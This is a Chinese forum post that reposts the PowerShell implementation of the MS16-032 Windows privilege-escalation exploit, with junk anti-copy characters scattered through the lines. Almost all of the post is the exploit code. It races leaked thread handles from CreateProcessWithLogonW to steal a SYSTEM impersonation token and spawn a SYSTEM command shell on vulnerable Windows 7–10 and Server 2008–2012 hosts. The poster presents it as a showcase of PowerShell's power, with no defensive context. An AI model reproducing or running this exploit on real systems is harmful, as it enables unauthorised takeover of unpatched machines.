古黑币0 个
成长值350 点
金币562 个
精华贴0 个
这个用户很懒,还没有填写自我介绍呢~
本帖最后由 soarcloud 于 2016-8-13 09:44 编辑
. P' X/ w2 { z2 I: o9 \- @
& ^* D% V% M) u/ i之前转了一堆关于Powershell基础的帖子,但是估计大家对Powershell到底能做什么还是没有个具体概念。那么下面就贴个用于用户提权的Powershell代码,看了之后就应该明白Powershell能干什么了#j334:不要问我提权是什么,如果这个都不清楚,那么就再好好学学吧#j346:
+ \. k9 ~! A _1 [1 J v5 s
+ ]4 |( C4 }- v7 A- X8 h7 e
; `) i9 M% g- M: y. b0 ~7 s4 `function Invoke-MS16-032 {9 S- d/ l9 j& A4 K
<#
( y4 g/ `, n) E- N# G* b) N.SYNOPSIS! s+ B- _' I1 t) y& D9 G" L
: j; E1 K1 A3 Q! \: S3 _& o
PowerShell implementation of MS16-032. The exploit targets all vulnerable
2 f/ l' }, F# ~$ U b( e% ^ operating systems that support PowerShell v2+. Credit for the discovery of
; V/ q% ^( ~7 W- \. Y+ H the bug and the logic to exploit it go to James Forshaw (@tiraniddo).
% f/ {6 C" M+ E+ k) ~+ A$ O8 t d; r- [, w: ^
Targets:
) k1 l& m7 L5 H; d3 O2 c- h; K- ]+ o' z% Q/ E6 B
* Win7-Win10 & 2k8-2k12 <== 32/64 bit!
4 N* H" g7 u5 V0 [ * Tested on x32 Win7, x64 Win8, x64 2k12R2
" i2 m( y7 F/ x! t# ?' B/ l4 g2 P W N* `- m2 s
Notes:
- ^. ?8 D6 X, `6 O0 ^8 }5 ~4 p* K2 s
* In order for the race condition to succeed the machine must have 2+ CPU
9 \+ k- D x! \! f cores. If testing in a VM just make sure to add a core if needed mkay.
9 ]3 x" j; I) _, j& ] * The exploit is pretty reliable, however ~1/6 times it will say it succeeded( S% j9 {* L+ x- ]$ ~! h) {6 ^
but not spawn a shell. Not sure what the issue is but just re-run and profit! N9 ^: L& s- m! ~8 T
* Want to know more about MS16-032 ==>! M5 G6 G7 ~) p1 Y* [6 U
https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html
( ^% F! l# Y: O' J4 |/ }.DESCRIPTION
; K3 \; ^7 i# Z( h3 N Author: Ruben Boonen (@FuzzySec)
. f7 X# }2 v! U, n7 O Blog: http://www.fuzzysecurity.com/
6 K0 l* @; Z6 k! @ License: BSD 3-Clause
7 S* o1 v5 |5 T9 ] u" _, N+ f Required Dependencies: PowerShell v2+
; F4 F0 }5 I0 q Optional Dependencies: None
5 {; m' P# c# T, i$ m. A1 } E-DB Note: Source ~ https://twitter.com/FuzzySec/status/7232540040426127362 A! ^' r" S, [% d
* S, k7 D+ g9 o1 [) h.EXAMPLE! k+ A% W. [$ d" R
C:\PS> Invoke-MS16-032
. } R& _. D+ F, G, G5 ~#>/ ]$ |( {# O- n) p4 ~# y! C
Add-Type -TypeDefinition @"
1 Q* t/ A+ m0 M8 \: \ using System;
* ?& @7 H& g$ c# Q: }- D using System.Diagnostics;
8 l" d s; z3 D9 Z* ?: a7 d; Z using System.Runtime.InteropServices;
# i, b& ^3 B- P D/ w3 T5 N7 H using System.Security.Principal;
# {( S9 I, \- A! B$ d
' z" `; q2 r2 A& r* b [StructLayout(LayoutKind.Sequential)]
) c7 q" p8 m2 Q% B/ p public struct PROCESS_INFORMATION
: h1 ~, L6 M9 ^* R- a: L5 B {
) h2 f6 a, `. G( g public IntPtr hProcess;
. a+ Q/ z0 i# q& x$ @. ^4 O0 G- C public IntPtr hThread;
; c% j0 W. _3 |: |& ~ public int dwProcessId;
7 g$ x- V. C* N- n% h @/ W$ m1 @ public int dwThreadId;
9 r* b/ n# G8 ?* S# f! @ }8 S! N$ f1 k. u: v& B1 o5 C& m$ d
5 p" E+ ]" k/ i7 i; A T* C [StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]2 P8 j' r) {" p' @ r7 t( D
public struct STARTUPINFO
0 Y% u- A/ u) R4 K! L {! b0 D% J: _! l/ N; m6 i" k. Y
public Int32 cb;9 F: K& W. f! t* r K
public string lpReserved;! }& P/ h# {' m
public string lpDesktop;
, @% a7 x j6 q& ]9 Q public string lpTitle;6 H3 @( s; h6 |- ]' I5 l7 P
public Int32 dwX;
/ [9 G3 Q5 G( u: ^9 J( P: o public Int32 dwY;4 K( C, E$ L' c# w' i; w
public Int32 dwXSize;
, w A% b ^+ a- s* _; Z$ ~. e/ W public Int32 dwYSize;, | t& Y6 c7 ~: ~
public Int32 dwXCountChars;8 L) h) e* C7 G( ~
public Int32 dwYCountChars;/ L; O, Z0 A- z( k# n
public Int32 dwFillAttribute;* {7 r& f1 v8 j& _8 [+ `
public Int32 dwFlags;# U4 R3 Y8 ^" p+ _
public Int16 wShowWindow;( ~& B9 U- s+ Z" I9 I% @( t& n0 s
public Int16 cbReserved2;
6 S8 L3 s9 E& E/ ?+ G public IntPtr lpReserved2;1 A# R; Z- l% S9 u' q4 @' G; G7 f
public IntPtr hStdInput;8 n4 y, V! O% u6 h
public IntPtr hStdOutput;, _% A* B/ q* a( e; p
public IntPtr hStdError;9 M' [4 t8 C& \! @- Q; \
}
* v+ B" q# L% w; v- y" @
" R+ x# W. Z- y) Z( B. v6 r5 u [StructLayout(LayoutKind.Sequential)]
1 p# }8 w% a& T+ ^ g0 Y0 O2 A% \ public struct SQOS# }' H) E* T! S E
{/ \: R$ \5 }2 M6 E" f$ ~# w3 M
public int Length;
/ o' H. a! t% g0 I& b% J9 t& U public int ImpersonationLevel;% \+ S4 w h3 ^2 Z( _6 Q2 V
public int ContextTrackingMode;
1 }3 e3 E' @* I; H6 C public bool EffectiveOnly;6 q9 ~ B. h3 Z) Z
}
. ^9 }3 P/ r6 @ ], T
, p8 Y \: { x& ~ public static class Advapi32
- x) b0 j9 R% J( t {0 U% t( O, E: l3 T' t7 h
[DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)]
* \7 G) m9 e9 H3 C1 } public static extern bool CreateProcessWithLogonW(
! _, \4 R Q1 ?) L6 G String userName,
+ d& |" x; P$ v* h* E String domain,
- C. p% S: S% Z String password,
. V! c1 @, ~% A" \ int logonFlags,
) J6 i6 a/ d. `( p# q; { String applicationName,
% D1 l: q6 y& z' R. C7 C String commandLine,
- y, W& P7 X; E/ F: c int creationFlags,, o/ Q" P) G) V' W2 s
int environment,2 v* Z% x3 d# n) b; l( j
String currentDirectory,
' K; S3 z% J( M ref STARTUPINFO startupInfo, @: h3 T+ B7 ?1 S: k
out PROCESS_INFORMATION processInformation);
( ]' p/ v9 e/ R( o @/ U: H1 B 8 S8 G- ^% @" N7 V
[DllImport("advapi32.dll", SetLastError=true)]" b+ @0 q6 I& V7 q8 A5 C
public static extern bool SetThreadToken(* ?' u4 |1 m' C+ t. v4 L5 X; c
ref IntPtr Thread,3 {7 N7 t' B! G
IntPtr Token);6 T& z1 a" w4 s3 z @3 U& j
1 K5 ?5 ~" x! n- l: C
[DllImport("advapi32.dll", SetLastError=true)]% a) A. m& n1 i) u( e" ]& W( i b
public static extern bool OpenThreadToken(
+ B! a, C+ k1 Y; l+ k9 U IntPtr ThreadHandle,7 i. w1 N8 a- T5 H* w
int DesiredAccess,
2 F& V, E8 \, d& O. y: e bool OpenAsSelf,9 x5 m" Q. U, U' n6 N
out IntPtr TokenHandle);6 c. T; r2 `- H; _: y" g
1 t7 e) V9 e; N' F4 M [DllImport("advapi32.dll", SetLastError=true)]
. }% ]( n" `- F" @' L public static extern bool OpenProcessToken() Y' `% i0 I3 Z7 w e
IntPtr ProcessHandle, 0 m7 `% Q; B9 x
int DesiredAccess,! r3 J- x4 F1 \* C& ] c
ref IntPtr TokenHandle);
* {4 r; B8 C( v' t+ X- |* l
* R( U( a' n% G$ P9 w7 b [DllImport("advapi32.dll", SetLastError=true)]
% ~ G( h) f8 S" ?# f, B: t8 g public extern static bool DuplicateToken(9 P# O' H0 W* K: R; o& o3 |, s) K" ?" _
IntPtr ExistingTokenHandle,, @& h* E$ X1 d& _
int SECURITY_IMPERSONATION_LEVEL,
- c( s7 L, h* n1 D! X8 ^2 J ref IntPtr DuplicateTokenHandle);4 v" C& M5 l- T
}
) ]4 |' v$ \# C3 @ ! t L; U2 \& Z
public static class Kernel32. e, g6 C E/ u; G/ ~ e8 J
{4 z/ m( `# E3 L# u) ~: n
[DllImport("kernel32.dll")]: ]" B* [ T. P; x: e2 X7 A- k
public static extern uint GetLastError();: b7 U0 h2 H/ O/ w( ~" {) _+ h5 j
9 e4 V5 k, W' P* x2 H3 S
[DllImport("kernel32.dll", SetLastError=true)]; P2 T5 J/ T P# r n) I |
public static extern IntPtr GetCurrentProcess();
7 l6 D! i8 d/ X. d! W 1 f4 c( j, D7 e( V% \; @
[DllImport("kernel32.dll", SetLastError=true)]: Z; M% }/ X! {2 e# z
public static extern IntPtr GetCurrentThread();
: X! [: R E, d9 ^
0 E% f5 n1 ^& v/ b# @: P [DllImport("kernel32.dll", SetLastError=true)]7 @1 U' `) U G2 \# [* C& V
public static extern int GetThreadId(IntPtr hThread);
( g7 E3 g9 i2 k g
- {" ]. x0 W/ L$ |4 d4 r. G [DllImport("kernel32.dll", SetLastError = true)]$ Q% g8 p3 m6 x: q0 R) |% U
public static extern int GetProcessIdOfThread(IntPtr handle);. v5 X/ G. a Z8 X r
; `" N* |# u0 V) B [DllImport("kernel32.dll",SetLastError=true)]
+ I" L9 G; n$ j6 f; p public static extern int SuspendThread(IntPtr hThread);; j9 Q2 C4 h0 F
p8 E# v& L) ?( k8 S, A( W9 b [DllImport("kernel32.dll",SetLastError=true)]
1 P" [0 E/ B2 F' z* z, p# H9 ` public static extern int ResumeThread(IntPtr hThread);" H' [* N+ e" N% b. M
( P+ ?& ?8 q# b$ O [DllImport("kernel32.dll", SetLastError=true)]
7 @& }0 L9 S: m public static extern bool TerminateProcess(
' F. d+ P1 v* J. v" V! X' h/ b, [ IntPtr hProcess,4 L- K& P/ m! i. d0 G
uint uExitCode);
- }% s/ I: S/ U) Y 1 D l7 U6 }7 f- F! n; i8 p5 p
[DllImport("kernel32.dll", SetLastError=true)]; B$ u9 L4 w7 L+ U$ ]
public static extern bool CloseHandle(IntPtr hObject);# A/ ^ w5 J8 ]5 T0 r* O
p$ U6 c# b. p, i; E6 v [DllImport("kernel32.dll", SetLastError=true)]
. m, d+ o" X& V9 c- |3 ]$ Q public static extern bool DuplicateHandle(4 I: C) E+ k3 l3 \6 o
IntPtr hSourceProcessHandle,
; g2 d0 a. t, q U0 v5 q1 F IntPtr hSourceHandle,
, ^. n" z9 o* l2 f8 k IntPtr hTargetProcessHandle,8 |! P+ `, q7 O+ e! |( P% a( F
ref IntPtr lpTargetHandle,
" ~$ H$ z& x: W# Q! {# X8 q int dwDesiredAccess,
" \7 i0 S1 V& F9 L% Q2 K- z* I" ~ bool bInheritHandle,
+ {' z+ {+ z3 Q int dwOptions);# s, e9 R5 |: { W6 N" ?
}
0 M3 q6 T; d) D6 R' h" U
4 l# K9 H& a5 X' D" C public static class Ntdll
0 j- ^/ `" |6 u3 H {) d+ k2 N/ S, T" M1 x* g& ?
[DllImport("ntdll.dll", SetLastError=true)]# y/ f6 c7 i+ o- K
public static extern int NtImpersonateThread(
) y9 Y" y0 g# t5 }6 V" Z IntPtr ThreadHandle,
& P; P, c" K2 q% F$ u1 B IntPtr ThreadToImpersonate,
8 E2 c/ g l0 \: y) m, f9 A$ b/ y ref SQOS SecurityQualityOfService);- m8 b* K( _$ ?9 c1 a' w4 n4 J
}! W( r/ l9 w' V
"@
2 c/ @; }1 @* W0 y( X" d9 z1 u- N1 R
, K% o/ a R$ z& b: h( x- _ function Get-ThreadHandle {
/ I: E( _3 l* j; J ]8 u # StartupInfo Struct
# d' r5 n, J2 d' M5 ^' `" L $StartupInfo = New-Object STARTUPINFO+ E q6 _2 P6 V+ W% Q# r1 L
$StartupInfo.dwFlags = 0x00000100 # STARTF_USESTDHANDLES5 D4 V- m4 @9 T+ B7 [8 n* W C- o% g
$StartupInfo.hStdInput = [Kernel32]::GetCurrentThread()- [8 g9 M/ p% ?) X
$StartupInfo.hStdOutput = [Kernel32]::GetCurrentThread()
4 i# t% k+ G! ]' G $StartupInfo.hStdError = [Kernel32]::GetCurrentThread()8 _( S* l& L( X8 R* c
$StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
4 ]4 D4 i6 Q" N4 e9 Y- z2 @ " I% h6 R: s- V7 k0 ^- b
# ProcessInfo Struct& J7 R* Z1 J! X5 h" T7 I' U) a; ?
$ProcessInfo = New-Object PROCESS_INFORMATION7 E: [; _. H) ]
) U6 d. M. H, H1 B7 W! G; q # CreateProcessWithLogonW --> lpCurrentDirectory
5 V9 b; i4 o4 Q0 o $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName: l! \5 ^( E$ W2 D) J, {6 v; }9 u
v. K# M! G2 u
# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
! F7 ?- N' G2 y4 \. f1 |! V9 X $CallResult = [Advapi32]::CreateProcessWithLogonW(
/ e6 i: l6 o& {& f* E2 K1 z "user", "domain", "pass",1 d+ @8 K: O* ]2 d3 Y& G
0x00000002, "C:\Windows\System32\cmd.exe", "",
1 x# Y& z, D2 x9 V9 g 0x00000004, $null, $GetCurrentPath,
2 n! F. H6 q* ] q [ref]$StartupInfo, [ref]$ProcessInfo)6 B. G; L* i5 f2 I3 Y( M( H1 @3 F
/ W! ~0 z. q- D( N. H/ S8 ~ # Duplicate handle into current process -> DUPLICATE_SAME_ACCESS) m( `% v" H$ z: G) O
$lpTargetHandle = [IntPtr]::Zero
7 w, k- \; U5 n& o" l $CallResult = [Kernel32]::DuplicateHandle(
9 e" G, e3 U* e5 h( P $ProcessInfo.hProcess, 0x4,8 \, A: r) x% C& T7 s. W6 b" X
[Kernel32]::GetCurrentProcess(),
' }* w; a% u W8 b0 C s9 P; p [ref]$lpTargetHandle, 0, $false,
' Z& l( h: r6 _$ [( f 0x00000002)
8 U4 n5 t+ X2 I; @" l. G
0 ^" q7 V H" W9 ~ # Clean up suspended process
0 a6 n9 j" G9 f1 ?9 b2 I$ S $CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)) i9 V! c3 c, b5 Y5 h# r* T
$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
# \! \! m2 s* Y0 q0 F, u* ^# l $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)% A& T1 z6 Z3 w5 ]! q$ n
6 ~& S& [) k: [) e& s2 _0 r1 V+ x6 x0 p $lpTargetHandle4 L& m* t! f+ L; B1 _
}( O+ _8 ]# s& o' ]
' |6 G" \" \+ |
function Get-SystemToken {& L/ R5 g0 i5 L! D- R* l, t! I1 V
echo "`n[?] Trying thread handle: $Thread"* C- ~# x; u, i" F- |- O
echo "[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($Thread))).ProcessName)"" s, u* w* s1 ~! A- g0 ^
' g3 z2 \( ^0 D1 J5 W, J% F" {/ ~ $CallResult = [Kernel32]::SuspendThread($Thread)
! u. l+ S9 ~: ?3 y if ($CallResult -ne 0) {! s1 o( }0 J4 k7 t
echo "[!] $Thread is a bad thread, moving on.."
- e# i4 h& o) i2 w Return
6 G1 a! t- C7 y* u6 Y } echo "[+] Thread suspended"
3 O+ _+ A2 J3 d& I: b
D$ B- t3 p+ i' I echo "[>] Wiping current impersonation token"
* x- y7 M; g: [# g5 g2 O $CallResult = [Advapi32]::SetThreadToken([ref]$Thread, [IntPtr]::Zero)
& V6 f6 w7 j4 q" |& O' [ if (!$CallResult) {5 T4 x5 R, f3 d' |
echo "[!] SetThreadToken failed, moving on..") _+ H+ n6 ~. E5 w8 R* @
$CallResult = [Kernel32]::ResumeThread($Thread)# c0 A; q1 K( i7 m4 e P
echo "[+] Thread resumed!"
/ \# A& @7 H& u Return& ^+ |% d% m# v
}8 G$ N8 ]7 N& X0 u# d
/ E4 h9 g/ M- i- N% ~0 @ echo "[>] Building SYSTEM impersonation token"+ H" l! {1 V9 w/ D
# SecurityQualityOfService struct; F+ N3 x f) x5 h
$SQOS = New-Object SQOS: m( N6 Y: l& A7 Y
$SQOS.ImpersonationLevel = 2 #SecurityImpersonation3 g$ C# o* j( e5 P5 R9 z
$SQOS.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SQOS)
- I' k e( y: J2 P7 H. P # Undocumented API's, I like your style Microsoft ;)
+ C, J! w/ w+ a6 r$ R" O $CallResult = [Ntdll]::NtImpersonateThread($Thread, $Thread, [ref]$sqos)5 N, C/ S; b/ _* S$ V3 k, S
if ($CallResult -ne 0) {% ^ F6 E: n; s+ w4 N( A( t2 ]; h
echo "[!] NtImpersonateThread failed, moving on..". N6 v+ }4 O6 r! U$ e0 A
$CallResult = [Kernel32]::ResumeThread($Thread)
2 j: t) j- w. s) q; J' z: d' P echo "[+] Thread resumed!"
+ D/ }8 d; F+ z. R) R. b: T Return! x. W5 I- Z3 g6 X
}
+ f, M( n7 `& f- { / ~; `& B! w m% h+ z
$script:SysTokenHandle = [IntPtr]::Zero, A: F o* V8 {" ]/ K1 Q
# 0x0006 --> TOKEN_DUPLICATE -bor TOKEN_IMPERSONATE
5 M5 {0 x# ^6 F G $CallResult = [Advapi32]::OpenThreadToken($Thread, 0x0006, $false, [ref]$SysTokenHandle)
1 `2 p4 P" t2 l; E! V if (!$CallResult) {
2 r a! `$ Q3 k. s& l echo "[!] OpenThreadToken failed, moving on.."
* P+ x, \6 l0 H: D4 q0 W $CallResult = [Kernel32]::ResumeThread($Thread)
# j6 P+ S& G, U/ V# f) _, b+ _1 z* i echo "[+] Thread resumed!"
* b5 K6 e# q6 F6 @ _ Return
. r; C! I) v! [. ?% b' a1 K }
# G0 L C5 M, D 8 O1 \4 x0 O# m
echo "[?] Success, open SYSTEM token handle: $SysTokenHandle"$ ^$ N( Z8 U& U! J$ ]
echo "[+] Resuming thread.."
" N) r1 i8 X2 q $CallResult = [Kernel32]::ResumeThread($Thread)3 X* p% E9 `8 g2 e. l3 L) c5 o/ s
}1 O! G) U/ U. q) ]# u y! k
7 x( r. d( l3 c& w4 g
# main() <--- ;)
/ T( ^' H& l+ J1 _2 s $ms16032 = @"' K8 H7 I7 [& X3 e5 I# ?
__ __ ___ ___ ___ ___ ___ ___ 2 F0 q% q4 i x# e [6 e- u
| V | _|_ | | _|___| |_ |_ |
4 Y. ]5 E& o/ E7 ` | |_ |_| |_| . |___| | |_ | _|* D, j' E! q. p; e; I3 I& @# k9 f
|_|_|_|___|_____|___| |___|___|___|8 |" [; }8 M, I& y- x- M! ~" h
( Z2 {2 W m& R9 J9 r5 G
[by b33f -> @FuzzySec], Q" W5 q" i; m c R+ ?6 c
"@/ O% L. ?7 k x/ b+ {
3 v. ]8 e( Y) _5 |
$ms16032
2 ?( D f0 C$ v! b* }: r % R! ? u1 v1 ~: r) Z* [/ F
# Check logical processor count, race condition requires 2+( R+ T0 o# z/ r! Q
echo "`n[?] Operating system core count: $([System.Environment]::ProcessorCount)"
2 @: i. @; X6 }- f. }: e9 N if ($([System.Environment]::ProcessorCount) -lt 2) {4 E" Z2 S# J3 d" `/ N
echo "[!] This is a VM isn't it, race condition requires at least 2 CPU cores, exiting!`n"
# j# v O: y7 {5 J7 l( b* j: T8 y Return/ K& J5 b' }" S U8 w8 `( }7 ~
}
. ~ e, x1 @1 H2 Y& ]2 f% c+ q" h
: O7 B. ?! _& ?8 f" O # Create array for Threads & TID's
# S& j5 H; O8 X' f8 V $ThreadArray = @()
' G) |: U* ^7 f% J) m5 j $TidArray = @()6 O1 i* X8 w) o0 `: W1 A
0 e5 Y& T6 P! z4 q8 Y' ~& d, N
echo "[>] Duplicating CreateProcessWithLogonW handles.."
) _! Y5 G- M0 f5 k( } # Loop Get-ThreadHandle and collect thread handles with a valid TID) T" r. H' f& T& c. I
for ($i=0; $i -lt 500; $i++) {# x5 N+ w4 s1 ?# T
$hThread = Get-ThreadHandle
7 |$ l& O) ~' Y/ v $hThreadID = [Kernel32]::GetThreadId($hThread)
6 K5 v5 _ c5 b # Bit hacky/lazy, filters on uniq/valid TID's to create $ThreadArray
& r' l1 R e) ~2 J/ v% \ if ($TidArray -notcontains $hThreadID) {* v5 q) O& m3 p' }- _
$TidArray += $hThreadID
4 C/ W# F- e4 J if ($hThread -ne 0) {
7 K5 i* j# o9 F V% r5 l $ThreadArray += $hThread # This is what we need!
8 R3 j" c" q! J2 `8 a/ |3 p- R! K* J }
8 W8 H' F5 r$ d8 {4 E! ?1 A9 r }: Y5 h- J# e7 m5 s+ v
}
r l$ ?* r- N7 K & @; C: M, ]2 j- `6 ]
if ($($ThreadArray.length) -eq 0) {5 g4 p& s$ n" y
echo "[!] No valid thread handles were captured, exiting!"
+ z3 |, i8 ~- G Return
" g1 c5 K5 W7 ^ [ } else {
& }- B3 G2 l0 M- ~- Q echo "[?] Done, got $($ThreadArray.length) thread handle(s)!"
7 P# b- f, r' f/ d- D0 x- I echo "`n[?] Thread handle list:"
4 v) Y" b7 N) o* y& ~, ]; K $ThreadArray
; k) P& C/ D0 }+ b" e }
+ r! K o1 X: i. S( A
: I) h9 x& Y- w8 c% A. K( q1 W: p7 u echo "`n Sniffing out privileged impersonation token.."
# |4 Y7 ?% {* p5 ^ foreach ($Thread in $ThreadArray){
4 S2 h' m# e/ X ) L M- L" G. G3 o% N
# Get handle to SYSTEM access token4 m; ]+ H5 A- Q; j4 h$ d! n
Get-SystemToken8 b) ~0 E }+ S/ a- B8 h$ u6 m
; T- N) K8 ~5 B/ g- Y* W echo "`n Sniffing out SYSTEM shell.."
8 V9 i# ~0 |; f- H9 ?, q echo "`n[>] Duplicating SYSTEM token"
+ e8 J/ y7 H0 b8 P8 H9 ? $hDuplicateTokenHandle = [IntPtr]::Zero
! u$ d# U0 C6 P0 O. } $CallResult = [Advapi32]::DuplicateToken($SysTokenHandle, 2, [ref]$hDuplicateTokenHandle)1 ~+ D! m* W- a8 I8 ^2 ]! ^
J% [9 m3 D- U" D; a! C # Simple PS runspace definition+ T7 M; n6 q- t1 ^4 }1 O' s# H
echo "[>] Starting token race"7 T8 p: x1 i' w' E- e
$Runspace = [runspacefactory]::CreateRunspace()
8 ` r% }% T8 h% L; h $StartTokenRace = [powershell]::Create()
9 j. C5 Q0 G1 h1 f4 W, { $StartTokenRace.runspace = $Runspace! M# r/ [% M4 S0 W
$Runspace.Open()
0 c$ a9 z7 \8 w [void]$StartTokenRace.AddScript({5 H7 n( D! T- U# Y# k+ [ k
Param ($Thread, $hDuplicateTokenHandle)6 O& z" ?& V: |9 o4 {% l: m' X. l
while ($true) {
" A2 u# w# y0 c* u $CallResult = [Advapi32]::SetThreadToken([ref]$Thread, $hDuplicateTokenHandle)4 ?1 U( y+ `. H+ l v
}
& Q4 t4 f" B7 b. n }).AddArgument($Thread).AddArgument($hDuplicateTokenHandle)
- n& y7 ^: V; S; s1 v: N; X8 r $AscObj = $StartTokenRace.BeginInvoke()
+ g: Y% ^3 ]% P0 n$ G, B1 M: ?2 R 4 Q4 d( S6 R* {' [
echo "[>] Starting process race"+ i# B& E& ?5 o) } Z8 }% p
# Adding a timeout (10 seconds) here to safeguard from edge-cases8 z. g$ x5 W6 s0 A
$SafeGuard = [diagnostics.stopwatch]::StartNew()3 E* \4 @- v# B" y, i% `* B M
while ($SafeGuard.ElapsedMilliseconds -lt 10000) {
4 s2 n1 w# ~5 d # StartupInfo Struct
- Q0 b3 d: k1 I5 Q1 K $StartupInfo = New-Object STARTUPINFO$ D% n$ j5 B3 ?, d7 e+ T/ d
$StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
- q/ ? j8 o6 {3 m" B 1 u* t( ~, [0 ?; K, L: J
# ProcessInfo Struct
4 U1 v" K2 M/ E5 E' o, K $ProcessInfo = New-Object PROCESS_INFORMATION
3 S! z" B0 r" b
* C5 Y% k# F3 {2 R+ L3 ?: U* n: E # CreateProcessWithLogonW --> lpCurrentDirectory
0 I( J# q& y# A $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName- D' ]$ s2 D P9 e# P+ R ]9 f
2 k' {! i' b* `; o8 q r$ l # LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED. i: B H! r' W8 S) N3 T
$CallResult = [Advapi32]::CreateProcessWithLogonW(
6 @ d2 [* W1 W1 O7 `( Z "user", "domain", "pass",
+ F" l/ G' ?7 P9 T7 @! G# D 0x00000002, "C:\Windows\System32\cmd.exe", "",3 C; O1 |4 H; O' H0 {
0x00000004, $null, $GetCurrentPath,
2 I6 u5 |0 q& _1 K1 S. m [ref]$StartupInfo, [ref]$ProcessInfo)
% s k7 ?' ~2 n5 a) s
8 H5 F/ I0 f% m3 J0 k $hTokenHandle = [IntPtr]::Zero5 w& r. x; l" ?+ @4 \- I$ o
$CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle)$ T( g# `+ ^( ]6 ?, x, A4 l
# If we can't open the process token it's a SYSTEM shell!* R Q( b2 A7 X7 r+ Y2 H8 \+ Z1 \
if (!$CallResult) {
; ?7 z! l5 R% X! m- K; O: O3 o echo "[!] Holy handle leak Batman, we have a SYSTEM shell!!`n"
& R0 C) O% D% i& F5 x, W8 E& Q2 ` $CallResult = [Kernel32]::ResumeThread($ProcessInfo.hThread)8 B/ T2 o/ i; M8 n% O
$StartTokenRace.Stop()& W. G7 y3 M1 A* h- l! C7 r- L
$SafeGuard.Stop()
/ S, @/ c" Y- u" [0 U Return
/ P' }" K: N8 ]0 a5 ~$ v2 t }1 U" \/ u" ]: V8 H1 ]/ t5 `
O2 Q7 q/ Q( I7 b6 E # Clean up suspended process
( q/ ]& W$ B/ Y1 [: o $CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1); T1 C6 r. N$ w8 M- w
$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
2 x K+ e* G* i* F2 {5 R0 q8 y $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
3 x* k# @/ }, f# W' O }
# H. o0 A) m: s# Y ! i' Z/ F' P* K- F* ^3 o
# Kill runspace & stopwatch if edge-case9 W( P+ B3 }4 }2 Z& ?
$StartTokenRace.Stop(); S3 g- A. w* S
$SafeGuard.Stop(), D4 E* Q8 K6 Q7 ^
}
: f) l- d" X3 {3 [# z& a* X: a! U}
% M( n! a' B2 r) ?0 X. j看完代码后,长期从事windows编程的同学应该已经看出来powershell的强大功能了吧。呵呵。
3 N% @2 ]/ y6 W" ^# j& ^2 w. N, K# v1 n2 s! U* E. J9 \) T. V
2 Q5 |9 j" X9 L, L$ P5 N) I
6 r3 T; `7 [! @; m/ j# C, W3 y4 v2 \ c" A( i: r8 D5 ^
4 _2 F6 m# }$ F: Z1 N$ M
|
|
「龙战于野」
2016-8-13 09:01
变色卡
「古黑浩劫」
